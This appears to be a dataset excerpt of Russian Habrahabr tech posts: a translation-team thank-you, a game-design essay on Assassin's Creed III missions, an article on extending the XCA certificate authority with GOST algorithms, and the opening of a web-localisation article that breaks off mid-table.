Слева доцент Киевского Национального Университета (КНУ) Александр Барабанов (перевод 3.5-до конца, редактирование 5.4-до конца, упражнения 2, 3.1-3.4, 5, приложение A.1-7, также ключевой переводчик слайдов для преподавателей ). Справа Евгений Короткий, руководитель лаборатории Лампа КПИ Киевского Политехнического Института, ключевой переводчик слайдов для преподавателей:
А вот Алексей Фрунзе, Imagination Technologies, специалист по Java virtual machine, бывший работник Микрософта и основной редактор 6-й главы:
А вот слева — Павел Кустарев, ключевой редактор 4-й главы, из питерского Университета ИТМО:
Третий справа — выпускник МИФИ Иван Графский, у которого возникла идея коллективного перевода:
В форматировании книги помогало РОСНАНО, точнее eNANO (дочка РОСНАНО по образовательным программам).
eNano также помошло с одним из сиквелов к переводу Харрис & Харрис — также выходящему прямо сейчас электронному курсу «Специализированные интегральные схемы наноуровня» Чарльза Данчека (он есть на трех предыдущих фотографиях).
Слева Юлия Осаулец, организатор образовательных проектов РОСНАНО:
Юлия также организовала серию сопутствующих курсов :
И последнее слово предоставляем девушке Ирине:
→ Бумажный Харрис & Харрис
→ Видео Чарльз Данчек / Nanometer ASIC
С Новым Годом! | https://habrahabr.ru/post/317558/ |
habrahabr | Уроки дизайна миссий в открытом мире, полученные из Assassin’s Creed III | ["assassin's creed", 'открытый игровой мир', 'дизайн миссий'] |
Assassin’s Creed III стала игрой, побудившей меня начать вести блог, в котором я рассказывал о дизайне её разных уровней. Эта серия постов стала довольно популярна в сообществе любителей... |
Assassin’s Creed III стала игрой, побудившей меня начать вести блог, в котором я рассказывал о дизайне её разных уровней. Эта серия постов стала довольно популярна в сообществе любителей Assassin’s Creed. Хотя, если быть честным, недавно я пытался перечитать их, и лучше бы мне было оставить их в покое. Написанное мною несколько лет назад теперь заставляет меня испытывать стыд (даже если со стороны кажется, что причин для него нет). С другой стороны, этот стыд по крайней мере показывает, что за эти годы я набрался опыта.
Теперь я снова вернусь к Assassin’s Creed III в этой статье, касающейся всей франшизы и темы дизайна миссий в целом. Я думаю, что эта игра очень подходит для изучения принципов дизайна уровней открытого мира, и не потому, что он прекрасно реализован в игре. Если взять игру в целом, то это не так. Однако в ней есть множество как положительных, так и отрицательных примеров миссий в открытом мире. Это означает, что их анализ позволит сделать полезные выводы, которыми я поделюсь с вами. 0. Нарушать правила допустимо, если это имеет смысл
Прежде чем начать, я хочу упомянуть, что не надо воспринимать каждый урок как инструкцию. Вполне можно не следовать им, если это имеет смысл с точки зрения игрока. Поэтому для каждого принципа я попытаюсь подобрать пример, в котором можно его игнорировать. 1. Позвольте игроку достичь нужной точки удобным ему способом
Если вы хотите, чтобы в игре с открытым миром игрок попал из точки А в точку Б, просто поставьте маркер точки Б и скажите ему попасть туда (именно это и создаёт в мире множество возможностей перемещения). Это может выглядеть очевидным, особенно учитывая то, что в предыдущих играх Assassin’s Creed такое часто использовалось. Но в Assassin’s Creed III это происходит не всегда.
Возьмём, например, миссию «Битва при Банкер-Хилле» (Battle of Bunker Hill), первая задача которой — добраться до Патнэма (Putnam). Вы не только должны находиться рядом с случайным континентальным солдатом, который проведёт вас к цели. Он ещё и отказывается двигаться, пока вы не на лошади. Если вы не выполните два этих условия и попытаетесь добраться до Патнэма в одиночку, то миссия будет провалена и перезапустится с точки сохранения. Это невероятно ограничивает. Если вам нужно, чтобы игрок прошёл по определённому линейному пути, то создайте классическое линейное окружение. Например, как уровни Tomb из предыдущих игр, или в случае Assassin’s Creed III, уровни «Карта сокровищ» (Treasure Map). К примеру, «Форт Уолкотт» (Fort Wolcott) — это линейный уровень, при этом он очень интересный. Но открытый мир и ограниченные линейные «тропы» сочетаются не очень хорошо.
С другой стороны, в той же миссии «Битва при Банкер-Хилле» (Battle of Bunker Hill) есть пример того, когда имеет смысл не позволять игроку двигаться по произвольному пути. Я говорю о скоплении британских сил и их линиях огня, которые находится между вами и вашей жертвой. Британцы убьют вас, если вы подберётесь слишком близко. В моём посте, написанном несколько лет назад, я утверждал противоположное — что игрок ДОЛЖЕН иметь возможность пробраться сквозь эти войска. Но, честно говоря, в основном я считал так из-за желания увидеть событие из трейлера E3 в самой игре.
Я не думаю, что технически это возможно, потому что там слишком много NPC, влияющих на скорость игры. В Assassin’s Creed: Unity с технологией нового поколения это допустимо, но в Assassin’s Creed III используются трюки и отзеркаливание для отображения больших скоплений людей. С точки зрения логики тоже очевидно, что одинокий боец, сражающийся с целой армией, погибнет. Даже если он всемогущий ассасин. 2. NPC должны приспосабливаться к игроку, а не наоборот
В Assassin’s Creed иногда бывает, что вам нужно, ведя разговор, пройти с дружественным NPC до определённой точки. Или просто проследовать куда-нибудь с NPC. И вы либо следуете пути NPC, или рискуете провалить миссию. В общем случае игроку хочется, чтобы был какой-то маркер, как в предыдущем пункте, и чтобы сопровождающий игрока NPC приспосабливался к его поведению.
Исключением могут быть случаи, когда игрок ДОЛЖЕН увидеть определённую локацию, например, в обучении на своей базе. Или если нужно выследить враждебного NPC, то именно игрок должен приспосабливаться под NPC для выполнения задания. 3. Дополнительные задания должны соответствовать персонажу. Лучше, чтобы они не определяли стиль игры
О, дополнительные задания. В Assassin’s Creed III их целая куча на любой вкус.
Есть произвольные, которые совершенно не имеют смысла. Например, в миссии «Война надвигается» (Conflict Looms) есть дополнительное задание — убить в прыжке гренадёра на одном из судов. Хитрость в том, что там есть ещё дополнительное задание остаться незамеченным. Поэтому для выполнения этого задания нужно сначала зачистить всё судно, а потом готовиться к убийству в прыжке. Но основное задание заключается в поджоге пороха и уничтожении всех кораблей, поэтому скрытность и убийство в прыжке кажутся неестественными.
Ещё есть задания, противоречащие персонажу. В миссии «Повар в гневе» (The Angry Chef) мы должны незаметно убить пять охранников (нелетальные нокауты не считаются). В то же время Коннор пытается убедить рассерженного повара из названия миссии, что насилие — это не решение проблемы. Тут есть явное противоречие. Всё это осложняется тем, что в Assassin’s Creed выполнение дополнительных заданий считается «полной синхронизацией», т.е. выполнением миссий так, как это делал предок. И Коннор выглядит лицемером, заявляя в кат-сценах, что он против необязательного насилия, в то время как дополнительные задания во многих миссиях связаны с необязательным насилием. И оправдание Анимуса «это не обязательно повторение того, что случилось» в данном случае не подходит.
Существуют также задания, принуждающие игрока проходить миссию определённым способом. Например, в «Битве при Банкер-Хилле» (Battle of Bunker Hill) есть дополнительное задание убить жертву в прыжке. Проблема в том, что это сразу же заставляет игрока пройти игровую область определённым способом, не пытаясь импровизировать и искать свой собственный путь. И это в игре, где свобода выбора и стиля игры считаются важными.
Конечно же, есть и хорошие дополнительные задания. Например, в миссии «Битва при Монмуте» (Battle of Monmouth) во время отступления есть побочное задание — предотвратить казни патриотов. Это соответствует персонажу – Коннор бы не позволил казнить своих союзников во время боя. Это добавляет сложности – существует ограничение по времени всего отступления и игрок должен успеть выполнить основное и побочное задания вовремя. И задание не определяет стиль игры, оно не требует «убей палачей из лука» или чего-то подобного. На самом деле игрок даже не обязан убивать палачей, он может просто отвлечь их, чтобы патриоты смогли сбежать.
В качестве исключения можно привести хороший пример миссии «Преданное доверие» (Broken Trust), в которой дополнительное задание заключается в том, чтобы остановить людей племени нелетальными способами. Да, выполнение этого задания определяет стиль игры, но оно также соответствует характеру Коннора – он не убил бы собственных соплеменников.
В целом, я думаю, лучше всего делать дополнительные задания побочными задачами, а не способами выполнения основного задания. 4. Провал миссии не должен быть концом
В идеальном случае нужно стремиться к тому, что провалом миссии была бы только смерть игрока. Если вы удалились от союзника или были обнаружены, то игра должна не прекращаться, а менять свой контекст. Если вас обнаружили, то вы вступаете в битву и ситуация меняется (например, охрана вашей жертвы усиливается). Если вы далеко от союзника, то он или идёт за вами, или, по крайней мере, стоит и ждёт вас.
Хороший пример в Assassin’s Creed III — миссия «Агрессивные переговоры» (Hostile Negotiations). Это уровень с убийством, где нужно устранить Уильяма Джонсона (William Johnson). Игрок не проваливает миссию, если его обнаруживают (однако он проваливает дополнительное задание — убить Джонсона незаметно). Игрок не проваливает миссию, если Джонсон видит его. В этой ситуации он начинает убегать и игрок должен преследовать его. Также миссия не провалена, если все местные жители убиты в бою (однако будет провалено дополнительное задание).
Провал миссии может стать обязательным тогда, когда смена контекста невозможна. Например, если убит союзник. Или если обнаружение не допустимо с точки зрения сюжета. Возможно, это не идеально, но понимается игроком и имеет для него смысл. 5. Постарайтесь, чтобы в миссиях использовалось как можно больше инструментов
Assassin’s Creed III предоставляет игроку довольно много инструментов, как предметов, так и способностей рекрутов-ассасинов. Проблема в том, что бóльшую часть времени миссии не рассчитаны на использование этих инструментов.
Например, у рекрутов-ассасинов есть возможность переодеваться в униформу охранников и имитировать заключение в тюрьму. Это хорошее переосмысление возможностей Монаха/Куртизанки из предыдущих игр. Проблема в том, что эта способность, появляющаяся во второй половине игры, в действительности используется только в побочной миссии, в которой вы её получаете. Хотя её можно использовать для захвата фортов, но в основных миссиях ей нет полезного применения. Поэтому она просто бездействует.
Пример миссии, в которой есть отличное использование инструментов — «Чаепитие» (The Tea Party). В первой части уровня нужно зачистить игровую область от английских солдат. Конечно же, можно выполнить задачу, просто ввязавшись в ближний бой, но вы можете также использовать дымовые бомбы и отравленные дротики, чтобы упростить работу. Довольно странно, что способность рекрута-ассасина Riot, полученная ранее в игре, здесь неактивна. Но доступны способности других бостонских рекрутов, и для зачистки области можно использовать Marksman.
Вторая часть уровня построена на защите игровой области на судах, в то время как союзники выкидывают чай. Здесь игрок может использовать боевые способности рекрута-ассасина, такие как Bodyguard или Calling для убийства атакующих британцев. Это, насколько я помню, единственная миссия в игре, где я использовал бомбы-ловушки. Их можно класть стратегически на абордажные доски, чтобы избавляться от нападающего врага, в то время как вы сражаетесь на другом конце игровой области.
Для этого принципа я исключений придумать не могу. Потому что невозможно, чтобы в каждой миссии были возможности для использования всех имеющихся у игрока инструментов. Но мне кажется, стоит убедиться, что есть достаточно причин для создания на уровнях инструментов, которые будут использоваться в течение всей игры.
Есть, конечно, и другие уроки, полученные из Assassin’s Creed III, но они, как мне кажется, больше применимы для дизайна уровней в целом. Перечисленные выше особенно важны для миссий в открытом мире, хотя сейчас я думаю, что их можно использовать и для дизайна уровней вообще. Перечислив эти принципы, я хочу сделать краткий обзор того, где в Assassin’s Creed III есть хороший дизайн и примеры миссий открытого мира, а где плохой. Примеры хорошего дизайна миссий: часть 6
В миссиях части 6 есть некоторые просчёты, в основном в дополнительных заданиях. Но они всё равно являются очень хорошим примером дизайна миссий открытого мира.
Там есть «По следу Джонсона» (On Johnson’s Trail), миссия в которой заключается в исследовании Бостона и выполнения побочных заданий в процессе перемещения к открытой охраняемой зоне с контрабандным грузом, который нужно уничтожить. Также вы перемещаетесь по игровой области и выполняете интересные вам задания.
Затем идёт «Повар в гневе» (The Angry Chef), являющаяся хорошим примером миссии по сопровождению и защите. Так как на предыдущем уровне у игрока было много свободы, более линейный подход не мешает игре.
Также там есть «Чаепитие» (The Tea Party), начинающаяся как сценарий свободной зачистки игровой области. Затем она переходит в ситуацию активного столкновения с врагом, в которой нужно выкидывать ящики с чаем, одновременно защищая союзников от нападающих британских солдат. Эта и предыдущая миссии дают меньше свободы, но в них всё равно есть вариативность и возможность выбора в контексте заданий, что важно.
Часть завершается классической для Assassin’s Creed миссией по убийству в «Агрессивных переговорах» (Hostile Negotiations). Вы знаете свою стартовую точку и местонахождение цели, можете добраться к ней любым способом, устранить её и сбежать.
Игрок проходит эту часть и вживается в неё. Именно в этом и заключается Assassin’s Creed — в ощущении сюжета в открытом мире. Эта часть интересна полностью и это, наверно, самая любимая моя часть игры. Примеры плохого дизайна миссий: часть 8
Теперь мы рассмотрим часть 8, которую я могу назвать своей самой нелюбимой из всей игры.
Первая миссия «Нечто постороннее» (Something on the Side), показывает первое посещение Нью-Йорка, но игрок совсем не может исследовать город. Как только вы попадаете в него, вы должны следовать за союзником по заданному пути (или провалить миссию). Сразу после этого нужно выследить жертву по заданному пути (или снова провалить миссию). Затем нужно преследовать другую жертву через город или, конечно же, провалить миссию. После поимки жертвы вы не переходите к исследованию открытого мира, а попадаете в тюрьму.
Это место действия миссии «Тюрьма Брайдуэлл» (Prison Bridewell), длинной и скучной. Вам нужно подслушивать из своей камеры, затем поспать, потом поговорить с NPC и сыграть с ним в настольную игру. Куча дел в одном и том же месте. После всех этих забот вы даже не можете сбежать.
Следующая миссия — «Публичная казнь» (Public Execution). Это миссия с убийством, но она состоит из линейного пути через толпу, который сначала нужно пройти, потом посмотреть кат-сцену, быстро собраться и добежать до жертвы. И после завершения миссии игрок телепортируется в совершенно другое место за пределами от Нью-Йорка.
Эта часть знакомит с новым городом, но не даёт исследовать ни дюйма его территории. За линейным прохождением идёт линейное прохождение. У игрока отбирают все инструменты и чаще всего есть только один способ выполнения того или иного действия. По моему мнению, это пример того, как не нужно делать миссии в условиях открытого мира.
В заключение хочу сказать, что основной принцип дизайна миссий открытого мира, взятый мной из Assassin’s Creed III — предоставление игроку возможностей самовыражения в контексте миссии. В идеале контекст должен быть как можно более свободным, но для вариативности можно ограничивать его пределы и вносить дополнительные преграды там, где это имеет смысл. При этом не стоит полностью отнимать у игрока возможность действовать самостоятельно. | https://habrahabr.ru/post/317434/ |
habrahabr | XCA – удостоверяющий центр уровня предприятия или сага о русских и немецких программистах | ['openssl', 'xca', 'x509 v3', 'keypair', 'pkcs11', 'pkcs10', 'госуслуги', 'гост 34.10-2012', 'гост 34.11-2012', 'crl'] | I think noone ever looked at the code as deeply as you did.
Christian Hohnstädt, Programming, Translation and Testing XCAПеревод:Я думаю, что еще никто так глубоко не заглядывал в мой код, как... | I think noone ever looked at the code as deeply as you did.
Christian Hohnstädt, Programming, Translation and Testing XCA Перевод: Я думаю, что еще никто так глубоко не заглядывал в мой код, как вы.
Christian Hohnstädt, разработчик XCA Удостоверяющий Центр (УЦ, Certification authority — CA) – это достаточно сложный организм, который включает в свой состав не только программно-аппаратный комплекс, состоящий из множества компонент, но и требующий наличия целого штата высококвалифицированных специалистов для обеспечения его работоспособности и т.д. Можно спросить, а зачем вообще нужен удостоверяющий центр, какую продукцию он производит и где она применяется? Что общего между сертификатом x509 и паспортом гражданина? Что общего между паспортным столом и Удостоверяющим центром?
Главная функция УЦ центра – изготовление и сопровождение сертификатов ключей проверки электронной подписи (СКПЭП), включая создание ключевой пары по обращению владельца сертификата. Сразу оговорюсь, по моему глубокому убеждению, последняя услуга УЦ центра вредна и опасна.
Тот, кто получил сертификат и ключевую пару (закрытый и публичный ключ или как его еще называют ключ проверки электронной подписи), в любой момент может отказаться от своей электронной подписи (ЭП) под документом и заявить, что у него ключ могли украсть в УЦ в момент его генерации. Поэтому ключевую пару правильно генерировать самому и хранить как зеница око, а если и генерировать его в УЦ, то только на токене/смарткарте PKCS#11 с неизвлекаемым ключом.
Отметим, что УЦ выпускают сертификаты в соответствии со стандартом X.509 v.3 ( RFC 5280 ).
Вообще функции УЦ во многом совпадают с функциями паспортного стола , которые находятся в ведении МВД России.
Сертификат, также как и паспорт, выдается на основании заявления и предоставления ряда документов. Перечень документов для получения сертификата есть на любом удостоверяющем центре , имеющим аккредитацию Минкомсвязи. Что является главным в паспорте, получаемым гражданином? Это серия и номер, кем и когда выдан, фотография и собственноручная подпись гражданина в паспорте, заверенные подписью сотрудника ОВД и скрепленные печатью.
А что является главным в сертификате? У него также есть серийный номер, кем выдан, сведения о гражданине, включая и СНИЛС и ИНН, и аналог фотографии и собственноручной подписи гражданина – это публичный ключ или ключ проверки электронной подписи. И вот это все заверяется электронной подписью УЦ. И полученный документ (файл) и называется сертификатом. Вы спросите, а где же закрытый ключ, с помощью которого собственно и ставится электронная подпись под документами? А закрытый ключ, как мы говорили выше, должен храниться у гражданина на электронном носителе (флэшка, токен/смарткарта), аналогично тому, как умением ставить личную подпись, образец которой он и оставил в своем паспорте, владеет он и только он. Поэтому всегда можно абсолютно уверенно сказать действительная подпись гражданина под документом или нет. Как ни странно аналогичная ситуация и с электронной подписью. Имея закрытый ключ, гражданин может однозначно получить открытый ключ и по нему проверить его сертификатом подписан документ или нет! А что делать гражданину, если у него украли или он потерял паспорт? Срочно необходимо заявить в паспортный стол, ОВД. После этого паспорт считается недействительным и он попадает в список недействительных российских паспортов . С этого момента любые юридические действия со ссылкой на утраченный паспорт недействительные. Аналогичная ситуация и с отзывом сертификата. Если был утерян закрытый ключ (а он как правило хранится на отторгаемом носителе – флэшка, токен, смаорткарта и т.п) или есть подозрение, что его скопировали, то надо срочно обращаться на УЦ, чтобы сертификат отозвали (признали недействительным). Он в этом случае попадает в САС – список аннулированных сертификатов. Хочу обратить внимание, что сертификат отзывается не тогда, когда пропал сертификат, а именно закрытый ключ. Сам сертификат вещь публичная и дубликат его всегда можно подучить на УЦ. Зачем нужен сертификат x509? И так зачем нужен сертификат гражданину РФ и юридическим лицам? Самое узнаваемое – это доступ на портал Госуслуг . Не менее значимое – доступ на портал ФНС. Далее — электронные торги и многое другое. Как правило, этот список есть на каждом УЦ, зарегистрированном в Минкомсвязи.
С юридическими лицами и гражданами РФ все ясно. А зачем сертификат проверки электронной подписи может понадобиться сотруднику некоего предприятия? Оказывается для многого. Личный сертификат (сертификат и ключевая пара), хранящийся на токене или смарткарте с интерфейсом PKCS#11, может служить и пропуском на территорию предприятия и обеспечивать доступ к компьютеру, дает возможность подписывать и шифровать документы , иметь доступ в личный кабинет на портале предприятия, пользоваться услугами корпоративной VPN, иметь доступ к порталу предприятия по авторизованному HTTPS. И для этого совсем не обязательно получать для внутрикорпоративных целей сертификат вне предприятия на аккредитованном Минкомсвязью УЦ и платить за это деньги. С другой стороны, развертывание полномасштабного УЦ на малых и средних предприятий не только не по силам, но и аналогично стрельбе из пушки по воробьям. Малому и среднему бизнесу не нужна большая часть функциональности подобных комплексов: ни к чему им маcштабируемость, горячее резервирование, разделение полномочий и т.д. Предпосылки появления XCA (X Window System Certification authority)
Для выпуска для издания сертификатов x509v.3 можно было бы воспользоваться широко используемой командной утилитой OpenSSL , в частности, она позволяет выполнять следующие функции: генерация ключей (например, openssl genrsa… );
формирование запроса в формате PKCS#10 на получение сертификата x509 v.3;
издание сертификата x509 v.3;
формирование списка аннулированных сертификатов (САС/CRL);
и т.д.
Если внимательно посмотреть, то оказывается, что все это функции УЦ, более того одна из команд утилиты OpenSSL, а именно команда CA представляет собой УЦ с минимально-необходимой функциональностью: $openssl ca -md <hash> -in <req_file> -out <cert_file>
где: ca – команда, для работы с УЦ
md — опция, указывающая на то какую хэш-функцию (например, sha1, sha512, gosthash ) использовать для выдачи сертификата ключа проверки электронной подписи (ЭП)
in — опция, указывающая на то, что запрос на сертификат ключа проверки ЭП надо взять из файла <req_file>
out — опция, указывающая на то, что сгенерированный сертификат ключа проверки ЭП надо записать в файл <cert_file>
Недостатки использования командной утилиты OpenSSL очевидны: большое количество команд и еще большее число параметров команд, в частности, только для выпуска сертификата требуется не менее 5 команд ;
достаточно сложный конфигурационный файл openssl.cnf;
но самое главное – отсутствие единого хранилища (базы данных) сертификатов, что очень и очень затрудняет процесс управления сертификатами
Именно последний пункт отличает в лучшее сторону аналогичный по сути проекту OpenSSL проект NSS (Network Security System), который широко используется для работы с сертификатами в проектах от Mozilla, браузерах Chrome от Google (ССЫЛКА — ) и т.д. А если говорить еще и об удобстве работы, то хотелось бы иметь единый графический интерфейс на базе X Windows System для издания и управления сертификатами (Certification authority). X Window System — оконная система, обеспечивающая стандартные инструменты и протоколы для построения графического интерфейса пользователя. Функционал XCA И вот исходя из этих предпосылок и родился проект с открытым кодом ( Copyright ) XCA , в котором для криптографических преобразований используется библиотека OpenSSL, для графического интерфейса используется библиотека Qt, а в качестве языка программирования язык C++. Для проектирования графического интерфейса использован Qt Designer (утилита designer), что делает весьма простым доработку графического интерфейса с учетом специфических требований российского законодательства и нормативных актов регуляторов, например, форму графического интерфейса для нового сертификата (файл ~/src/ui/NewX509.ui):
Для хранения объектов УЦ в XCA создается база данных, доступ к которой защищен паролем.
Графический итерфейс XCA как удостоверяющего центра реализован в виде пяти функциональных вкладок и двух выпадающих меню: — функции управления базой данных, предназначенной для хранения информации о ключах, сертификатов и других объектов XCA; — функции создания и управления ключами; — функции управления запросами на сертификаты (PKCS#10); — функции управления сертификатами x509 v3; — функции управления шаблонами для запрсов; — функции управления списками аннулированных сертификатов (САС/CRL); — функции управления токенами/смарткартами PKCS#11;
Можно смело утверждать, что графическое приложение XCA является Центром выдачи и управления Сертификатами (далее ЦС XCA). О поддержке российских криптоалгоритмов в XCA
Теперь нас будет интересует поддержка российских криптоалгоритмов в ЦС XCA. И если бы это происходило до 2012 года, все было бы хорошо: к тому времени в проекте OpenSSL уже появилась поддержка и ГОСТ Р 34.10-2001 и ГОСТ Р 34.11-94 и ГОСТ 28147-89. Но в 2012 году были утверждены новые криптографические алгоритмы ГОСТ Р 34.10-2012 и ГОСТ Р 34.11-2012, а в 2015 году были утверждены новые аггоритмы для шифрования «кузнечик» и «магма», а именно ГОСТ Р 34.12-2015 и ГОСТ Р 34.13-2015.
К сожалению, в настоящее время OpenSSL не поддерживает новые российские алгоритмы. В этом случае имеется два пути решения проблемы. Первый связан с разработкой нового engine , на подобие имеющегося libgost, с поддержкой новых российских алгоритмов. Второй путь – это непосредственное встраивание российских алгоритмов в OpenSSL. Второй путь представляется более предпочтительным, так как и в первом случае необойтись без модернизации OpenSSL, хотя с точки зрения реализации новых требований ТК-26 хотя бы к контейнеру PKCS#12. Встаивание новых алгоритмов предполагает прежде всего включение российских OID-ов, рекомендуемых ТК-26, в проект OpenSSL ( obj_mac.h ): #define SN_cryptopro "cryptopro"
#define NID_cryptopro 805
#define OBJ_cryptopro OBJ_member_body,643L,2L,2L
#define SN_cryptocom "cryptocom"
#define NID_cryptocom 806
#define OBJ_cryptocom OBJ_member_body,643L,2L,9L
#define SN_id_tc26 "id-tc26"
#define NID_id_tc26 958
#define OBJ_id_tc26 OBJ_member_body,643L,7L,1L
…
Для удобства встраивания ГОСТ-алгоритмов в XCA и идентичности с OpenSSL отметим также введенные константы, определяющие тип ключа для ГОСТ: #define EVP_PKEY_GOST3410 NID_id_GostR3410_2001
#define EVP_PKEY_GOST3410_2012_256 NID_id_GostR3410_2012_256
#define EVP_PKEY_GOST3410_2012_512 NID_id_GostR3410_2012_512
Вот как теперь могла бы выглядеть структура struct typelist typelist[] в файле NewKey.cpp: static const struct typelist typeList[] = {
{ "RSA", EVP_PKEY_RSA },
{ "DSA", EVP_PKEY_DSA },
#ifndef OPENSSL_NO_EC
{ "EC", EVP_PKEY_EC },
#endif
/*ГОСТ Р 34.10-2001 */
{ "GOSTR3410-2001", EVP_PKEY_GOST3410},
/*ГОСТ Р 34.10-2012 с длиной ключа 256 бит*/
{ "GOSTR3410-2012-256", EVP_PKEY_GOST3410_2012_256},
/*ГОСТ Р 34.10-2012 с длиной ключа 512 бит*/
{ "GOSTR3410-2012-512", EVP_PKEY_GOST3410_2012_512},
};
И вот такая доработка OpenSSL и позволяет встроить российские криптографические алгоритмы в ЦС «XCA». Теперь ЦС «XCA» может выполнять все функции УЦ, начиная с генерации любых ГОСТ-ых ключей:
выпуском сертификатов и кончая выпуском списков аннулированных сертификатов(CRL/САС):
Выше мы говорили, что приватный ключ и сертификат сотрудники предприятия должны получать на отторгаемом носителе. В качестве такого носителя в ЦС «XCA» используются токены/смаркарты (token/smartcard), имеющие интерфейс PKCS#11. Если говорить о поддержке российской криптографии, то необходима доработка проекта для поддержки токенов PKCS#11 с соответствии с рекомендациями ТК-26 ( pkcs11_gost.h ): …
#define NSSCK_VENDOR_PKCS11_RU_TEAM 0xd4321000 //0x80000000|0x54321000
#define NSSCK_VENDOR_PKSC11_RU_TEAM NSSCK_VENDOR_PKCS11_RU_TEAM
#define CK_VENDOR_PKCS11_RU_TEAM_TC26 NSSCK_VENDOR_PKCS11_RU_TEAM
… Размещение ЦС «XCA» на предприятии
И так, в итоге мы будем иметь полнофункциональный УЦ масштаба предприятия, полностью поддерживающий российскую криптографию.
Где размещать ЦС «XCA»? Самое разумное – это отдел кадров или служба безопасности. Приходя при приеме на работу в одну из этих служб сотрудник получает здесь помимо все прочего токен, на котором сгенерирован неизвлекаемый ключ:
и установлен его сертификат:
В итоге в БД ЦС «XCA» будут храниться как корневой самоподписанный сертификат центра, так и сертификаты сотрудников предприятия:
В БД также находится информация о том, где хранятся приватные ключи: Новогодние хлопоты
И вот, после кропотливого изучения проекта, его автору Christian Hohnstädt в предверии Нового Года было отправлено следующее письмо: Hello, Christian!
We monitor your product XCA. Exploring it, we raise our professional
level. We adapt it to use Russian cryptographic algorithms. In gratitude
for your work we want to send you a gift (a bottle of Russian vodka),
but, unfortunately, do not know your post address. Please let us know
it,so we can send you a gift.
В переводе это выглядит так: Здравствуйте, Christian!
Мы следим за вашим продуктом XCA. Исследуя его, мы повышаем свой профессиональный уровень. Мы адаптировали его под Российские криптографическин алгоритмы. В благодарность за вашу работу мы хотим выслать вам подарок (бутылку русской водки), но, к сожалению, не знаем вашего почтового адреса. Пожалуйста, сообщите нам его.
И автор откликнулся: Thanks, please send it to me at my company address.
I'm usually not at home when parcel services deliver packets.
Innominate Security Technologies
Christian Hohnstaedt
Rudower Chaussee 13
12489 Berlin
Germany
Что примечательного в ответе автора: Спасибо, пришлите, пожалуйста, его на адрес моей компании. Обычно я не дома, когда служба доставки доставляет посылки. Оказалось, что немецкие программисты как и русские да и все программисты мира основное время проводят на работе!
И конечно, наш традиционно русский презент бутылка водки и коробка конфет, но с добавлением мягкой игрушки Лисенка, был доставлен Автору!!!
Но перед этим было письмо, выдержка из которого вынесена в начало статьи: If your programmers found issues or bugs in my code,
I ask you to tell me about them so I can fix them, too.
I think noone ever looked at the code as deeply as you did.
И вот перевод: Если ваши программисты нашли ошибки в моем коде, я прошу вас сообщить мне о них, чтобы я мог их исправить.
Я думаю, что еще никто так глубоко не заглядывал в мой код, как вы.
Такая оценка дорогого стоит.
Что тут можно добавить? Только то, что ЦС «XCA» функционирует под управлением ОС Linux, Mac OS X, других форков Unix и MS Windows. P.S. Можно только мечтать о таком сотрудничестве и понимании программистов двух великих стран – Российской Федерации и Федеративной Республики Германии. | https://geektimes.ru/post/283668/ |
habrahabr | Как научить веб-приложение говорить на 100 языках: особенности локализации | ['локализация', 'локализация интерфейса', 'интернационализация', 'javascript', 'i18n', 'l10n', 'перевод', 'web', 'web-разработка'] |
Ключевой особенностью онлайн-сервисов является то, что к ним имеют доступ пользователи практически со всего мира, говорящие на разных языках. Если вы разрабатываете такой сервис и хотите, чтобы... |
Ключевой особенностью онлайн-сервисов является то, что к ним имеют доступ пользователи практически со всего мира, говорящие на разных языках. Если вы разрабатываете такой сервис и хотите, чтобы им могли пользоваться люди из разных стран, то вам нужно его перевести и адаптировать, иными словами — локализовать.
Идея написания этой статьи возникла после MoscowJS митапа , на котором я говорил о том, как происходит процесс локализации в компании Badoo . Но в этой статье я бы хотел рассказать немного подробнее об особенностях локализации на примере веб-приложений, о том, какие существуют решения для локализации и почему в Badoo пошли своим путем. Всем неравнодушным — добро пожаловать под кат. Зачем и почему?
Если вы ориентируетесь только на российский рынок, то, скорее всего, локализация вам никогда не понадобится, или как минимум не понадобится до тех пор, пока ваш продукт не станет интересен международной аудитории. Тогда придется очень быстро адаптировать ваше приложение к новым реалиям, а это не так уж и просто. Поэтому стоит сразу определиться и ответить на вопрос: а нужна ли вам вообще локализация ? Если вы склоняетесь к положительному ответу, то ваш сервис необходимо будет подготовить к различным языковым особенностям. В целом приемы и инструменты, которые позволяют учесть такие особенности, называются интернационализацией, что есть процесс создания приложения, которое может работать на различных языках и с различными региональными особенностями без каких-либо дополнительных изменений.
Следующий вопрос, на который нужно дать ответ: почему локализация важна ? А важна она в первую очередь для пользователей и клиентов, ведь каждый из них должен чувствовать себя комфортно, используя ваше приложение. Например, резиденты какой-либо страны, даже если они хорошо знают английский язык, предпочитают совершать покупки на родном языке. Большинство из них также предпочитает пользоваться услугами службы поддержки на родном языке. Если мы возьмем Европу, в которой порядка 50 стран, то практически у каждой из них будут свои региональные особенности по отображению дат, чисел или валюты. А если мы расширим нашу аудиторию на весь мир, то появляются такие страны, как Китай, Иран, Афганистан или Саудовская Аравия, в которых запись текста идет справа налево или сверху вниз, а сами числа записываются с помощью индо-арабских или персидских цифр. Особенности языков На какие особенности языка стоит обратить внимание в первую очередь , если принято решение внедрять локализацию? В первую очередь стоит обратить внимание на отображение даты и времени в привычном для них формате. В нижеследующей таблице отображены несколько зависимостей формата от страны. Как вы видите, в большинстве стран формат разный. Формат
Пример даты
Страна
гггг.ММ.дд
2016.09.22
Венгрия
гггг-ММ-дд
2016-09-22
Польша, Швеция, Литва, Канада
гггг/ММ/дд
2016/09/22
Иран, Япония
дд.ММ.гггг
22.09.2016
Россия, Словения, Турция, Украина
М/д/гггг
9/22/2016
США
Формат записи времени также зависит от страны. Например, в США, Канаде, Австралии, Новой Зеландии используется 12-часовой формат времени (английская система), в остальном мире — 24-часовой формат (французская система).
Следующей особенностью является формат чисел и отображение валюты. Как видно из таблицы ниже, тысячный и десятичный разделитель может выглядеть как запятая, точка или пробельный символ. А положение знака валюты может отличаться не только в разных языках, но и в разных странах. Например, такие страны, как Германия и Австрия, говорят на одном языке, но денежный формат имеют разный. Пример
Локаль
Страна
123 456,79 €
ru-RU
Россия
€123,456.79
en-US
США
123.456,79 €
de-DE
Германия
€ 123 456,79
de-AT
Австрия
